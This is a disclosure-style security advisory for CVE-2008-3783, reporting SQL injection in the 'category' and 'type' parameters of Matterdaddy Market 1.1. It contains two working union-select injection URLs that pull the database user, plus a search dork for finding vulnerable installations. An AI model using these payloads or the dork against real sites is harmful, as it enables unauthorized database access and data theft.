Topic : | Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities
|
SecurityAlert : 4185
CVE : CVE-2008-3783
CWE : CWE-89
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : !Dok_tOR!
Published : 27.08.2008
Affected Software : | Matterdaddy, Matterdaddy_market, 1.1 |
 Advisory Content : Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Dork:
made by matterdaddy
References :
http://securityreason.com/expldownload/1/4527/1 (Exploit)
http://www.securityfocus.com/bid/30809
http://www.milw0rm.com/exploits/6297
http://secunia.com/advisories/31564
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|